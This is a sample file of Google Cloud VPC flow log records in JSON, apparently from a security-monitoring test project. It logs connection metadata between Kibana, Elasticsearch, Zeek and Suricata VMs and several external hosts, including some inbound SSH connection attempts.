-{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"198.51.100.182","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"198.51.100.88","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"203.0.113.12","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"203.0.113.58","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"203.0.113.134","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"203.0.113.58","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"203.0.113.27","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 